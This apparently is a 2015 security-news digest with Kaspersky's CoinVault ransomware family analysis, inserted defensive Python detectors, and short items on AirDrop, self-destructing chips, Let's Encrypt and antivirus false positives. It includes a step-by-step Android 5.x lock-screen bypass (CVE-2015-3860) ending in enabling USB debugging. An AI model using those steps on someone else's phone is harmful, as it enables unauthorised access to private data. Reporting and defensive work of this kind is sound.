The ransomware sequel: alternative ways of profit harvesting
17.9.2015 Source: Kaspersky

A day after we published our No Ransom Campaign decryptor in the fight against the CoinVault ransomware, we were contacted by a fellow researcher from Panda, Bart Blaze. He kindly suggested that new variants of this dreadful ransomware were available and that he would happily share them with us. After obtaining the new MD5 hashes for the files, we set out to find more clues, more files, and to analyse what these new malware variants had to reveal: three malware families that had striking similarities with each other.



In the end we found some interesting surprises (for more details about what we found, please read on).

However, the best thing was that, based on our analysis, the National High Tech Crime Unit of the Dutch police was able to apprehend two suspects last Monday.

The story begins with CoinVault

Our search began with the discovery of the first version of CoinVault, in May 2014 (please see the table at the bottom of this post for MD5s and additional information on this, and other, hashes). Interestingly enough, this sample did not run on every computer, so we have omitted any further analysis of this version here.

Then suddenly there was Comhost

Two months after we detected the initial version of CoinVault, we detected two near-identical samples. The two files differed only in how the malware was unpacked and executed from the resource section in the binary.

Both binaries loaded the same payload, an executable known as ‘comhost.exe’. Comhost was completely different from CoinVault in terms of functionality. While CoinVault fell into the category of traditional ransomware (until this point, at least), Comhost was more of an infostealer. If you cannot wait to find out more, please skip forward!

Once executed, the malware resolved the two hardcoded domain names to IP addresses. After that it started the keylogger and a timer. Once the set time had elapsed, the search for bitcoin wallets began. Most likely the attackers implemented this functionality because mining for bitcoins has become increasingly hard.



In addition, the malware was able to execute commands received from the C2.



Back to CoinVault

Fast forward two months and we saw another example of CoinVault. This time the program code had striking similarities with Comhost. For example, some functions such as fixNOIPhosts(), were almost identical, marking a clear connection between CoinVault and Comhost. The design of the program was also very similar to Comhost.

Fortunately, the authors of this piece of malware made a small mistake. Instead of overwriting the original file with encrypted content, they created a new file in the same directory with a ._clf extension.



Next, the original file was deleted by calling the File.Delete() function. Internally, this method was implemented as a call to the Win32Native.DeleteFile() function. The DeleteFile function marked the file as deleted in the MFT entry. This meant that CoinVault victims, who got infected with this specific version of the malware, were probably able to retrieve deleted files during forensic activity (when not too much disk activity had taken place after deleting the file).
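
The encrypt-then-delete sequence just described, a new file created beside the original with a ._clf suffix followed by deletion of the original, is a behaviour a host monitor can alert on well before a ransom note appears. The following is an added example, not code from Kaspersky or from the CoinVault authors: a detector over constructed file-activity events in a simple 'timestamp,pid,action,path' format (a real deployment would feed Sysmon or auditd events in the same shape); the alert threshold of three victims per process is an assumption.

```python
"""
Added example, not from Kaspersky or the page: behavioural detection of the
CoinVault pattern described above. A process that creates <name>._clf and
then deletes <name> in the same directory is counted once per original file;
a process that does this to THRESHOLD or more files is reported.
The event lines are constructed, not a real capture.
"""
from collections import defaultdict

SUSPICIOUS_SUFFIX = "._clf"
THRESHOLD = 3            # victims per process before alerting (assumption)

def parse_events(lines):
    """Yield (timestamp, pid, ACTION, path) from 'ts,pid,action,path' lines."""
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, pid, action, path = line.split(",", 3)   # path may contain commas
        yield ts, int(pid), action.upper(), path

def detect_encrypt_then_delete(lines, threshold=THRESHOLD):
    """Return {pid: [original paths]} for processes showing the pattern."""
    pending = defaultdict(set)    # pid -> originals whose ._clf twin was created
    hits = defaultdict(list)
    for _ts, pid, action, path in parse_events(lines):
        if action == "CREATE" and path.endswith(SUSPICIOUS_SUFFIX):
            pending[pid].add(path[:-len(SUSPICIOUS_SUFFIX)])
        elif action == "DELETE" and path in pending[pid]:
            pending[pid].discard(path)
            hits[pid].append(path)
    return {pid: paths for pid, paths in hits.items() if len(paths) >= threshold}

# Constructed sample: pid 4120 behaves like CoinVault; pid 880 is a benign
# editor that writes a .bak copy and removes the old file.
SAMPLE_EVENTS = """\
# constructed sample, not a real capture
2014-09-01T10:00:01,4120,CREATE,C:\\Users\\u\\Docs\\report.docx._clf
2014-09-01T10:00:01,4120,DELETE,C:\\Users\\u\\Docs\\report.docx
2014-09-01T10:00:02,4120,CREATE,C:\\Users\\u\\Docs\\budget.xlsx._clf
2014-09-01T10:00:02,4120,DELETE,C:\\Users\\u\\Docs\\budget.xlsx
2014-09-01T10:00:02,880,CREATE,C:\\Users\\u\\Docs\\notes.txt.bak
2014-09-01T10:00:03,880,DELETE,C:\\Users\\u\\Docs\\notes.txt
2014-09-01T10:00:03,4120,CREATE,C:\\Users\\u\\Pics\\cat.jpg._clf
2014-09-01T10:00:03,4120,DELETE,C:\\Users\\u\\Pics\\cat.jpg
""".splitlines()

if __name__ == "__main__":
    for pid, victims in detect_encrypt_then_delete(SAMPLE_EVENTS).items():
        print(f"pid {pid}: {len(victims)} files encrypted-then-deleted")
        for path in victims:
            print("   ", path)
```

The list of original paths the detector returns is also the forensic to-do list: because this CoinVault version deleted originals through File.Delete, which only marks the MFT entry as free, those exact files are the ones worth carving from the disk image, provided the machine was isolated before much new data was written.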

The introduction of the S.H.I.E.L.D Runner and added functionality

One month after the appearance of the last CoinVault sample, a new version of Comhost was introduced. This was the first sample that contained the “S.H.I.E.L.D Runner”. The functionality of this particular piece of code has already been discussed in a previous blog post.

Apparently the malware authors were not quite satisfied with the previous version of Comhost: they had forgotten to add some keylogger functionality (checking for caps lock, etc.). Another interesting added feature was the collection of information about the installed antivirus and the default browser, which was sent to the C2. However, the most interesting new feature was the ActivecaptionWatcher class, which was able to take screenshots and send them to the C2.

Mailspreader and added obfuscation

In November 2014 we had already written about CoinVault: that post discussed the sample that appeared a few weeks after the last version of Comhost. All the samples that appeared around this date were obfuscated with Confuser. But one thing that we omitted in our analysis was a functionality that we couldn’t really place back then: the internal class ‘emailDownloader’.

This class contained some interesting pieces of code that needed to be further analysed. The presence of several executable files was referenced, but where were they? And more importantly, what was their role during the infection?



As it turns out, these files were dropped by the third piece of malware from the CoinVault family: the Mailspreader. The resources section within the binary shows that several files were embedded and we extracted them in order to study them separately.



Code economy is a common pattern across all the modules found in CoinVault samples. The functionality was simple but more than enough to achieve the desired results. A thread was created and then started in order to make use of everything the ‘MailSpreader.exe’ file had to offer.



As mentioned before, the C2 we discovered is shared with another sample, which had similar characteristics (MD5 hash value of AF0E5A5DF0BE279AA517E2FD65CADD5C), another indicator of the relationship between CoinVault and Mailspreader.

Using these executable files and a straightforward manner of making the infection ‘invisible’, the bad guys launched a new process that was hidden almost instantly, putting all the malicious email code to work.



We still haven’t answered the question of what these executable files represent, or what their real use is in this ransomware scheme. We’ll start with ‘mailpv.exe’, which was part of CoinVault and presented some ‘dropper’ methods to actually obtain the primary payload. As for ‘nk2edit.exe’ and ‘livecv.exe’, a quick Google search revealed their true nature: both were legitimate tools used to interact with Outlook and Windows Live Messenger.

The file ‘livecv.exe’ had an MD5 hash of D7FC749BB3B10FCC38DE498E8DB2639A, and presented a verified signature for the executable. As per the developer’s description of the utility, ‘LiveContactsView is a small utility that allows you to view the details of all contacts in your Windows Live Messenger’.



The same happened after checking ‘nk2edit.exe’ (C1A591727E4519AC0D94C59B680E00E4). This is a convenient utility that interacts with the AutoComplete list address book in Microsoft Outlook.



RIP CoinVault

After the previous release of our CoinVault research, this threat and its creators remained silent for a while. It wasn’t until April 2015 that a new sample was spotted in the wild. The most noteworthy change was the presence of flawless Dutch phrases throughout the binary. Dutch is a relatively difficult language to write without any mistakes. Therefore, we suspected at the beginning of our research that there was a Dutch connection to the alleged malware authors.

Other interesting added functionality was the checking and killing of analysis and detection processes such as processhacker, spyhunter, roguekiller, etc. Moreover, this version also came with support for storing configuration data in .ini files.

Shortly after these new versions emerged, the Dutch police were able to seize the C2 server used by the criminals and provide us with the bitcoin wallet IDs, IVs and keys necessary for creating and providing a decryption tool.

And then…it stopped. We didn’t hear anything about CoinVault for a while and it seemed the campaign had ended.

Hello BitCryptor

We were right that CoinVault had stopped. However, one month later BitCryptor emerged.

BitCryptor is clearly the successor of CoinVault, since most of the code is exactly the same. However, unlike the previous versions of CoinVault, BitCryptor does not target a Dutch audience: all the Dutch text has been removed (as have all the links to CoinVault). A small feature has also been added that runs in the background and checks whether the victim has already paid.


Since our initial report on CoinVault, and the presentation of the No Ransom campaign, the cybercriminals responsible for these creations have been trying to modify their creations to keep on targeting new victims. Winning the battle against ransomware is a joint effort between law enforcement, private companies and end-users. In this particular case, by working together, we achieved a great result: the apprehension of two suspects.

Nevertheless, now more than ever, education about how these threats operate and target victims is of paramount importance, along with alerting and reporting new incidents as soon as possible. Thanks to our fellow researcher Bart Blaze for sharing the samples – indeed we had a happy reversing time :-)


AirDrop Bug in Apple iOS and OSX allows Hackers to Install Malware Silently


The latest iOS 9 includes a security update for a nasty bug that could be exploited to take full control of your iPhone or Mac, prompting most Apple users to download the latest update.
Australian security researcher Mark Dowd has disclosed a serious vulnerability in AirDrop, Apple's over-the-air file sharing service built into iOS and Mac OS X.
How the Attack Works?
The vulnerability allows anyone within range of an AirDrop user to silently install a malicious app on a target Apple device by sending an AirDrop file; the attack also involves a reboot of the target device.
An attacker can exploit this critical bug even if the victim rejects the incoming file sent over AirDrop.
After the reboot, the malicious app gains access to SpringBoard, Apple's software for managing the iOS home screen, allowing the app to fool the victim’s iPhone into believing that it has the same rights as a normal app.
These rights include access to:
and many more…
…that could allow a more skilled hacker to break into other sensitive areas of Apple's operating system, causing severe damage to the victim's device.
"AirDrop bug can be used to target people wirelessly in close proximity. Also useful for lock-screen bypass," Dowd, founder and director of Azimuth Security, tweeted.
Video Demonstration

Dowd also provided a video demonstration (you can watch below) showing the real time attack on his iPhone running iOS 8.4.1.
The vulnerability affects any iOS versions supporting AirDrop from iOS 7 onwards, as well as Mac OS X versions from Yosemite onwards.
Update to iOS 9 and Mac OS X El Capitan
Apple has responded to the vulnerability by adding a sandbox to AirDrop in iOS 9, which prevents anyone from writing files to arbitrary locations on the device via the AirDrop service.
However, it isn't clear when Apple will provide a complete patch to fix the issue.
So the only way to prevent this attack, for now, is by upgrading your devices to iOS 9 and OS X 10.11 El Capitan, which won't roll out before September 16 and 30 respectively.

This Computer Chip Self-Destructs in 10 Seconds (On Command) to keep Secrets Safe


In the spy thriller movie “Mission Impossible”, every time Tom Cruise receives a secret message, the last words state: “This tape message will self-destruct in 5 seconds”... and BOOM!
There’s a sudden explosion, and smoke comes out of the device that contained sensitive information a few seconds earlier.
This self-destructing gadget has now become a reality.
Palo Alto Research Center Incorporated (PARC), a Xerox company involved in IT and hardware R&D, has succeeded, under the Defense Advanced Research Projects Agency’s (DARPA's) Vanishing Programmable Resources (VAPR) program, in developing self-destructing computer chips capable of destroying themselves in 10 seconds.
The phenomenon sounds quite familiar, doesn’t it?
Now, with DARPA’s initiative, this is soon going to become a reality intended mainly for military personnel, with the idea of “protection of data that once existed.”
PARC showcased this breathtaking technology at DARPA’s “Wait, What?” event in St. Louis on Thursday, as part of the agency’s VAPR project.
The early model of the Integrated Circuit (IC) built by PARC focuses mainly on two technologies:
Transient technology
DUST (Disintegration Upon Stress-Release Trigger) technology
The data stored in these chips may be encrypted data or a secret message intended for an authenticated person.
The chip, designed on a Gorilla Glass substrate, is capable of shattering on demand into millions of pieces that cannot be reconstructed. This is the same glass that is used as a protective cover for smartphones.
“We take the glass and we ion-exchange temper it to build in stress,” said Gregory Whiting, a senior scientist at PARC. “What you get is glass that, because it’s heavily stressed, breaks; it fragments into tiny little pieces.”
In the demonstration in St. Louis, the team of researchers from PARC showed (see link below) how a laser light activated the self-destructing circuit; the activator could also be an RF signal or a physical switch.
“Vanishing electronic devices can be used to address military security, data privacy, and environmental science,” says PARC.
DARPA awarded PARC a $2,128,834 contract for the research under its VAPR program.
This discovery will prove to be of great importance because, in military operations, sensitive information is classified, i.e. only an authorized person is allowed to access it.

Many authentication methods and procedures are used by the military for this purpose, but in one way or another they are prone to being stolen or falling victim to cyber attacks, as seen in the current scenario.
The self-destructing chips leave no remains from which the data could be reconstructed.
This is not the first time such chips have been developed: DARPA had earlier awarded IBM $3,455,473 in December 2014 for “Developing and establishing a basis set of materials, components, integration, and manufacturing capabilities to undergird this new class of electronics”.
At that time, IBM described a different use of materials and engineering to build the self-destructing chips. Well, now let’s wait for their proposed idea to become a reality soon.

Hacker Finds a Simple Way to Bypass Android 5.x Lock Screen [Steps & Video]


, has found an easy way to bypass the security of locked smartphones running Android 5.0 and 5.1 (Build LMY48M).
Many of us use various security locks on our devices like Pattern lock, PIN lock and Password lock in order to protect the privacy of our devices.
However, a vulnerability could now allow anyone to take your locked Android smartphone (5.0 build LMY48I), perform a "MAGIC TRICK" and, as a result, crash the user interface (UI) of the password screen and gain access to your device.
The vulnerability, assigned CVE-2015-3860, has been dubbed as "Elevation of Privilege Vulnerability in Lockscreen".
How the Attack Works?
The secret behind the researcher's "MAGIC TRICK" is as follows:
Get the device and open the Emergency dialer screen.
Type a long string of numbers or special characters in the input field and keep copying and pasting it until the field's limit is exhausted.
Now, copy that large string.
Open the camera app, which is accessible without unlocking.
Drag down the notification bar and press the settings icon, which will show a prompt for the password.
Now, paste the previously copied string into the password input field repeatedly, to create an even larger string.
Go back to the camera and keep taking pictures or pressing the volume up/down buttons while simultaneously tapping the password input field containing the large string in multiple places.
All this is done to make the camera app crash. You will then notice that the soft buttons (home and back) at the bottom of the screen disappear, which is an indication that the app is about to crash.
At this point, stop and wait for the camera app to become unresponsive.
After a moment, the app will crash and drop you at the Home screen of the device, with all the encrypted and unencrypted data.
Now, without wasting time, go to Settings > Developer options > Enable USB debugging and control the device by installing the Android Debug Bridge (ADB) utility.
Video Demonstration shows Attack in Work
Watch the video demonstration given below, where you can see practically how Gordon executed the hack.

In addition, the number of users running Android 5.0 and 5.1 on compatible hardware, such as a Nexus 4 with the Google factory image occam 5.1.1 (LMY47V), is small; therefore the associated risk affects only those users.
Furthermore, there is good news for those users: Google has released and made public a patch for the vulnerability.

Kaspersky Internet Security now available in version 2016

16.9.2015 Security
Kaspersky has launched a new version of its Internet Security multi-device security solution. It is fully localized in Czech and provides comprehensive protection for users' devices.
The product includes updated technologies that protect users during any online activity, regardless of whether they use the Windows, OS X or Android platform.

For example, social networks and advertising or analytics agencies often request information about a user's online activities, such as location or search history. They obtain this data through the browser, resell it and use it to display contextual advertising.

The browser's anonymous mode removes this information from Internet traffic with the help of the Kaspersky plugin, which is available for Mozilla Firefox, Internet Explorer and Google Chrome, and reports any blocked requests to the user.

According to the vendor, this technology differs from other tools integrated into browsers in that it does not merely prevent identification via cookies or display warning pages, but guarantees that data which would allow the user to be tracked never leaves the device.

The Change Control feature detects any attempt to make changes, reports it to the user and asks for explicit permission for the process, or blocks it.

The updated Privacy Cleaner tool, in turn, helps remove all traces of user activity from computers running Windows, including search history and the list of recently opened documents.

The Webcam Protection feature prevents images from being captured by the webcam, alerts the user to access from a legitimate application and provides the option to block all access to the camera.

Let's Encrypt Project issues its First Free SSL/TLS Certificate
Last fall the non-profit Electronic Frontier Foundation (EFF) launched an initiative called Let's Encrypt, aimed at providing free digital cryptographic (TLS) certificates to any website that needs them.

Today, Let's Encrypt – a free, automated, open-source Certificate Authority (CA) – has signed its first certificate, hitting what it calls a major milestone on the way to encrypting the whole Web.

Let's Encrypt enables any Internet site to protect its users with free SSL/TLS (Secure Sockets Layer/Transport Layer Security) certificates that encrypt all the data passed between a website and its users.

Not just free: the initiative also makes HTTPS deployment easier for any website or online shop owner, helping to ensure the security of their customers' data.
"Forget about hours (or sometimes days) of muddling through complicated programming to set up encryption on a website, or yearly fees," EFF explains. "Let’s Encrypt puts security in the hands of site owners."
The first certificate signed by Let's Encrypt is currently available only to beta-testers though anyone can check out the CA's first certificate on the group's website, which is issued for

Once clicked, the above HTTPS link may lead you to an SSL certificate error. That is because your browser does not trust the certificate authority yet.
"Let's Encrypt has not yet been added as a trusted authority to the major browsers (that will be happening soon)," the site explains. "So for now, you'll need to add the ISRG root certificate yourself. Specifics will depend on your browser. In Firefox, just click the link."
Sign Up Now to Participate

Website owners who are interested in the beta testing phase can sign-up and submit their domain names for consideration.

Though major browsers do not yet recognize the certificate as a trusted authority, the Let's Encrypt team is working with Google (for Chrome), Microsoft (for Edge), Apple (for Safari), and Mozilla (for Firefox) to make it happen.

So, if everything goes well, the certificates will be available for everyone to use by the end of November 2015.

Securing the Internet with Let's Encrypt

Let's Encrypt is an initiative run by the Internet Security Research Group (ISRG) and backed by the EFF, Mozilla, Cisco, and Akamai, among others.

Specifically, Let's Encrypt promised to create a certificate authority (CA) which is:
Free – no charge for HTTPS certificates.
Automatic – the installation, the configuration as well as the renewal of the certs do not require any administrator actions.
Secure – the team is committed to being a model of best practice in their own operations.
Transparent – the records of all certificate issuance or revocation will be available publicly.
Open – the automatic issuance and renewal procedures will be published as an open standard.
Cooperative – Let's Encrypt is controlled by a multi-stakeholder organization and exists to benefit the community, not any of the consortium members.

Can an inevitable evil be conquered?


Scanning an object (a file or web resource) with an Internet security program essentially comes down to making a binary decision: dangerous or safe? An antivirus engine puts forward the hypothesis that an object is malicious and then checks whether this is true or not. Since there are, unfortunately, no perfect antivirus solutions, errors can occur. There are two types of error: the first kind is when safe objects are identified as dangerous; the second kind – when dangerous objects are identified as safe. Using the terminology inherited from mathematical statistics, errors of the first kind are called false positives.

Security system developers have varying attitudes towards false positives. Some regard the objective of combating infection as a higher priority. Kaspersky Lab’s position on this is absolutely clear: preventing false positives is as important as protecting against malware. Below, we look at the methods of fighting false positives, using our company as an example.

The negative positive

For the user, a false detection by the security solution means being unable to access a web resource or use a safe program. Regardless of how important a specific file or website is, a false detection is always an annoyance that can lead to a disruption of business processes.

If a program that has just been written by a user is falsely identified as dangerous, its author will send a complaint to the antivirus vendor, analysts will recognize the error and correct it next time the antivirus databases are updated. This usually takes several hours – provided, of course, that the program does not actually do anything beyond what is permissible for legitimate applications.

It is a completely different situation if an operating system component is identified as malicious. This could lead to much more dire consequences, sometimes as grave as system failure. And if this kind of false positive affects a large company, it will inevitably result in downtime and, as a consequence, lost profits. This is why we believe that companies that develop security systems should be very careful about errors of this type and should try to keep them to a minimum.

Reasons for false positives

First of all, it is essential to identify the reasons for such errors. These can vary.

The human factor is one possible reason for a false detection: an antivirus analyst is not immune to making mistakes. It is worth noting, however, that in today’s world instances of this are extremely rare, since nearly all threats (99%) are now detected automatically.

A false positive can occur when developers of legitimate applications use obfuscation (code entanglement) and packing (executable file compression). Cybercriminals often use these methods to make malware analysis more difficult, which is why security systems may suspect such applications of being malicious.

A false positive can be the result of using a generic signature that detects similar malicious objects. We have known for a long time that malicious objects are often variants of the same code. This means that by using more ‘intelligent’ classification methods we can identify a part that is common to all the similar malicious samples and create a single detection logic (i.e. a signature) that will provide detection of all the similar objects. Such generic signatures are created by different detection systems. The broader the criteria used by a system to identify the similar part of malicious objects, the greater the chances of the signature being triggered by a similar but innocuous object.

Finally, an object can be mistakenly identified as malicious by technologies that analyze program behavior. For example, if an unknown application begins to make suspicious changes to the system registry or to send the user’s private data over the network, the component that tracks operating system events should raise an alarm. The program doing this could be quite harmless, just not used very often.

Fighting false positives

Analysts have understood the potential consequences of false positives practically from the inception of the industry. However, both the number of users and the number of Internet threats were thousands of times smaller back then, and antivirus databases were released at much longer intervals. This being the case, the methods used 18 years ago to check antivirus databases were fairly uncomplicated: developers had a collection of critical clean files (primarily system files) and the experts simply scanned the collection using the new database before releasing an update. If there was a false positive, the relevant detection was removed after the first complaints were received. That is, the analyst team manually corrected the databases, preventing the threat from reaching a large number of users.

With time, the stream of malware has grown thousands of times over, and both malicious programs and the technologies used to detect malicious objects have become more sophisticated. Kaspersky Lab currently detects 325,000 new malicious objects every day. The range of methods used to combat Internet threats has also broadened: whereas in the nineties signature-based detection methods were quite equal to the task of protecting a computer, now Kaspersky Lab products include technologies that automatically prevent vulnerabilities from being exploited, tools for controlling application privileges, a component that tracks operating system events, and a range of other technologies. In addition, modern legitimate software databases take up terabytes of disk space.

Clearly, in such conditions it is no longer possible to use the archaic methods of fighting false positives. Today’s false positive prevention technologies are much more varied and effective. These methods are used both at the stage of detecting malicious objects and at that of testing and releasing databases. There is also a separate set of methods that help to minimize the chances of false positives appearing while a security product is operating.

Signature control

As Captain Obvious would put it, the easiest way to avoid false positives is to release error-free signatures. This is why special attention is given to the stages in which malicious object signatures are created. But even if an error manifests itself later, there is a way to correct the situation rapidly, even if the databases have already been installed on the user’s machine.

Detection stage (creating static signatures)

First, a dedicated automatic verification system analyzes the static signatures manually added to the databases by virus analysts. This is because a person, concentrating on closely analyzing code, may not see the complete picture. So, when somebody tries to add a signature to the database for an object that the system perceives as clean based on certain criteria, the automatic system reports the potential error to the analyst, together with the reasons for believing the object is clean.

Second, a collection of hashes (unique results of code transformation based on a specific algorithm) for objects known to be ‘clean’ is used to test new signatures for false positives. A signature created using a fragment of malicious code is matched against hashes from the collection. If the system detects that the new signature matches a legitimate object’s hash based on some criteria, a different code fragment is selected to create a signature for the threat.

Kaspersky Lab also keeps a separate database that contains the ‘personal record’ of each malicious object ever analyzed with protection technologies. When creating a detection, the past of a detected object is taken into account: if the object did not raise any suspicion in the past, it undergoes an additional check.

Additionally, a collection of files that have triggered false detections in the past is used for protection against errors. It helps to prevent incidents from occurring again if an object has been slightly modified (e.g. when a new version of a program is released).

Generic signatures are periodically added to static signature databases: if the automatic detection system registers lots of similar malware samples, a single detection logic is created to combat them.
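As an added illustration of the detection-stage checks described above (this is not Kaspersky Lab's code, nor code from the article), the following Python sketch hashes every fixed-length window of a constructed clean-file collection and of a collection of past false-positive files, then picks the first fragment of a constructed malicious sample that matches neither. The 16-byte window, the 8-byte step and all file contents are assumptions made for the example.

```python
import hashlib
from typing import Iterator, Optional, Tuple

WINDOW = 16  # length in bytes of a signature fragment (assumed value)
STEP = 8     # offset step between candidate fragments (assumed value)


def window_hashes(data: bytes, window: int = WINDOW) -> set:
    """Return the hash of every `window`-byte slice of `data`.

    Storing a clean-file collection this way means a candidate fragment
    can be tested by a set lookup instead of a scan over every file.
    """
    return {hashlib.sha256(data[i:i + window]).hexdigest()
            for i in range(len(data) - window + 1)}


class HashCollection:
    """Hashes of the windows of known 'clean' (or past false-positive) files."""

    def __init__(self) -> None:
        self._hashes: set = set()

    def add_file(self, data: bytes) -> None:
        self._hashes |= window_hashes(data)

    def contains(self, fragment: bytes) -> bool:
        return hashlib.sha256(fragment).hexdigest() in self._hashes


def candidate_fragments(sample: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield (offset, fragment) pairs cut from a malicious sample."""
    for offset in range(0, len(sample) - WINDOW + 1, STEP):
        yield offset, sample[offset:offset + WINDOW]


def pick_signature(sample: bytes, clean: HashCollection,
                   past_fp: Optional[HashCollection] = None
                   ) -> Optional[Tuple[int, bytes]]:
    """Choose the first fragment found neither in the clean collection nor
    among files that caused false positives before.

    Returns None when every candidate collides, i.e. no safe static
    signature can be cut from this sample and an analyst must look at it.
    """
    for offset, fragment in candidate_fragments(sample):
        if clean.contains(fragment):
            continue  # would fire on legitimate software
        if past_fp is not None and past_fp.contains(fragment):
            continue  # would repeat an earlier false positive
        return offset, fragment
    return None


def scan(data: bytes, signature: bytes) -> bool:
    """The simplest possible static scan: a substring match."""
    return signature in data


# --- constructed sample data (not real files) ---------------------------
# A prologue shared by every executable, clean or not, so that the first
# candidate fragments of the malicious sample collide with clean files.
COMMON_STUB = b"MZ\x90\x00" + b"This program cannot be run in DOS mode." + b"\x00" * 8
CLEAN_FILES = [
    COMMON_STUB + b"Contoso Notepad build 4.2 legitimate routine",
    COMMON_STUB + b"open-source archiver, packed with UPX 3.91",
]
# A training document that quotes a ransom note and caused a false positive once.
PAST_FP_FILES = [
    COMMON_STUB + b"ransom note: pay 0.7 BTC quoted in awareness training",
]
MALWARE = COMMON_STUB + b"ransom note: pay 0.7 BTC to unlock your files"


def build_collections() -> Tuple[HashCollection, HashCollection]:
    clean, past_fp = HashCollection(), HashCollection()
    for f in CLEAN_FILES:
        clean.add_file(f)
    for f in PAST_FP_FILES:
        past_fp.add_file(f)
    return clean, past_fp


if __name__ == "__main__":
    clean, past_fp = build_collections()
    print("clean collection only:  ", pick_signature(MALWARE, clean))
    print("with past-FP collection:", pick_signature(MALWARE, clean, past_fp))
```

With only the clean collection the first acceptable fragment straddles the shared stub and the ransom note, which is exactly the fragment that fired on the training document before; the past-FP collection pushes the choice further into the sample's unique code.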

Database testing and release stage

To ensure that signatures (static or generic) will not be triggered by ‘clean’ software, newly created databases are verified using the Dynamic Whitelist knowledge base. It is an enormous, continually expanding collection of legitimate software that also contains additional data on each object (developer, product name, the latest update version and much more). More detailed information on Dynamic Whitelist operation can be found here.

A special department at Kaspersky Lab is in charge of maintaining this collection and providing timely updates. Thanks to agreements signed with more than six hundred software development companies, most popular applications are included in the collection before they become commercially available to a broad user audience.

The system that performs the scanning deserves a separate mention. Since the legitimate software database is enormous and antivirus databases are updated once an hour, using a regular server to do the scanning is not an option. A distributed data processing system was developed specifically for this purpose. It uses dozens of servers and data storage facilities for load balancing.

All signatures that have raised even minor suspicions are entered into a separate register that can be called ‘potentially dangerous verdicts’. Such signatures undergo additional verification, often involving malware analysts.

Rapid response (fighting false positives at the operation stage)

When antivirus databases have passed all the necessary checks, they are distributed to users. The Kaspersky Security Network distributed cloud infrastructure receives statistics on any detections on user machines and tracks how many times each signature has been triggered.

Analysts responsible for releasing signature databases continue to carefully track how products respond to updates. If an anomaly is detected (a threat has been detected on too many user machines within a short time period), this could mean there is a false positive. In that case, an analyst receives an alert and begins to perform additional analysis of the detected object.

If analysis indicates that the object was identified as malicious by mistake, the Record Management System technology is triggered. It can recall a record in a matter of seconds, also using the Kaspersky Security Network. The incorrect signature is removed from databases, as well. If it turns out that a generic signature mistakenly detects ‘clean’ objects among others, analysts change the detection logic and correct the databases. In any case, by the next database update, the error will have been corrected.
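The rapid-response loop above, as an added example that is not Kaspersky Lab's code: constructed detection telemetry lines are replayed through a monitor that counts distinct machines per signature inside a sliding time window, raises an alert once a signature fires on more machines than expected, and lets an analyst recall the record so that later hits are ignored. The line format, the five-minute window and the threshold are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Optional, Set, Tuple

# Constructed telemetry, assumed format: "<ISO timestamp> <machine id> <signature>"
TELEMETRY = """\
2015-09-16T10:00:00 host-a1 SIG-EXAMPLE-0001
2015-09-16T10:00:05 host-b2 SIG-EXAMPLE-0002
2015-09-16T10:00:07 host-c3 SIG-EXAMPLE-0002
2015-09-16T10:00:09 host-c3 SIG-EXAMPLE-0002
2015-09-16T10:00:12 host-d4 SIG-EXAMPLE-0002
2015-09-16T10:00:20 host-e5 SIG-EXAMPLE-0002
2015-09-16T10:00:31 host-f6 SIG-EXAMPLE-0002
2015-09-16T11:30:00 host-g7 SIG-EXAMPLE-0001
2015-09-16T13:00:00 host-h8 SIG-EXAMPLE-0001
2015-09-16T13:05:00 host-i9 SIG-EXAMPLE-0002
"""


class DetectionMonitor:
    """Tracks how many distinct machines each signature fired on recently."""

    def __init__(self, window: timedelta, max_machines: int) -> None:
        self.window = window
        self.max_machines = max_machines
        self._hits: Dict[str, Deque[Tuple[datetime, str]]] = defaultdict(deque)
        self.flagged: Set[str] = set()    # signatures already handed to an analyst
        self.recalled: Set[str] = set()   # records withdrawn after confirmed FP
        self.alerts: List[str] = []

    def record(self, ts: datetime, machine: str, signature: str) -> Optional[str]:
        """Ingest one detection; return an alert string the first time the
        signature exceeds the expected number of machines in the window."""
        if signature in self.recalled:
            return None  # record withdrawn; the product no longer fires on it
        hits = self._hits[signature]
        hits.append((ts, machine))
        while hits and ts - hits[0][0] > self.window:
            hits.popleft()  # forget hits that fell out of the sliding window
        machines = {m for _, m in hits}  # the same machine re-scanning is one hit
        if len(machines) > self.max_machines and signature not in self.flagged:
            self.flagged.add(signature)
            alert = (f"{signature}: {len(machines)} machines within "
                     f"{int(self.window.total_seconds())}s, analyst review required")
            self.alerts.append(alert)
            return alert
        return None

    def recall(self, signature: str) -> None:
        """Analyst confirmed a false positive: withdraw the record."""
        self.recalled.add(signature)
        self._hits.pop(signature, None)

    def distinct_machines(self, signature: str) -> int:
        return len({m for _, m in self._hits.get(signature, ())})


def parse_line(line: str) -> Tuple[datetime, str, str]:
    ts, machine, signature = line.split()
    return datetime.fromisoformat(ts), machine, signature


def replay(telemetry: str, monitor: DetectionMonitor) -> List[str]:
    """Feed every telemetry line to the monitor and collect the alerts raised."""
    alerts: List[str] = []
    for line in telemetry.splitlines():
        if not line.strip():
            continue
        alert = monitor.record(*parse_line(line))
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    monitor = DetectionMonitor(window=timedelta(minutes=5), max_machines=4)
    for alert in replay(TELEMETRY, monitor):
        print(alert)
    monitor.recall("SIG-EXAMPLE-0002")  # analyst verdict: clean object
```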

Tracking proactive technology errors

At the development stage it is not so easy to check technologies that detect anomalous program behavior on user machines for false positives. Foreseeing all possible actions by the user on the machine and all the possible variants of ‘clean’ software that might be used in the process is virtually impossible. That is why it is primarily cloud technologies that protect users from false detections caused by proactive technologies.

When a product detects an unknown object – i.e. there is no information about it in local antivirus databases – the object’s hash is immediately sent to the cloud infrastructure, which responds with any available information in a split second. If the object is on the white list of trusted software, the object is recognized as safe.

In addition, cloud technologies can verify a suspicious file’s digital signature and the reputation of the company that issued the digital signature certificate. If the reputation is faultless and the certificate is genuine, this also indicates that the object is legitimate. It is worth noting that company reputation and signature data are not static. If incidents are reported, this may result in a loss of trust, leading to a change in the security solution’s response to the same files.

Proactive detection tools require particularly close attention when product functionality is being upgraded. When newly upgraded technologies start working in the field for the first time after lab testing, unforeseen errors may arise. This is why a phased approach is used instead of activating new protection mechanisms in all products at once. First, upgrades are supplied to a limited test group. If this does not result in false positives, the new features are made available to a broader user group. As a result, even if a new technology proves faulty, most users will never be aware of the fault.

Fighting false positives when scanning web resources

